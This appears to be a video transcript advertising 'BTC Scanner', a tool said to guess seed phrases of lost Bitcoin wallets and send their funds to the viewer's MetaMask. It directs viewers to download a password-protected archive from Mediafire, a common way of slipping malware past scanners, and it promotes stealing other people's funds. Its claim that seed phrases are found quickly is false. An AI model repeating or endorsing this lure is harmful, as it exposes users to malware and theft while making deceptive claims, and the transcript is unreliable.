Hello everyone. Today I will show you how to install and run BTC Scanner, a program that selects seed phrases for lost Bitcoin wallets and automatically sends the found funds directly to your MetaMask. The download link is in the description. Click on it to Mediafire. Click Download. Download the archive. We unpack it with the password from the description. The current password is always there. Next, open the browser, launch the MetaMask extension, and log into your crypto wallet. We need the address of the BTC wallet. We copy it, then the money will fall on it. Now back to the program. We paste the copied address into a special field and launch the scanner. The automatic search of the LED phrases begins. The program quickly finds access to a wallet with $15 in BTC and immediately sends this amount to our address. Everything happens completely automatically. Checking the result, we go back to the browser, open MetaMask, and see that $15 in Bitcoins are already on the balance. Everything is working. The money has arrived. If it was useful, like and subscribe. Good luck.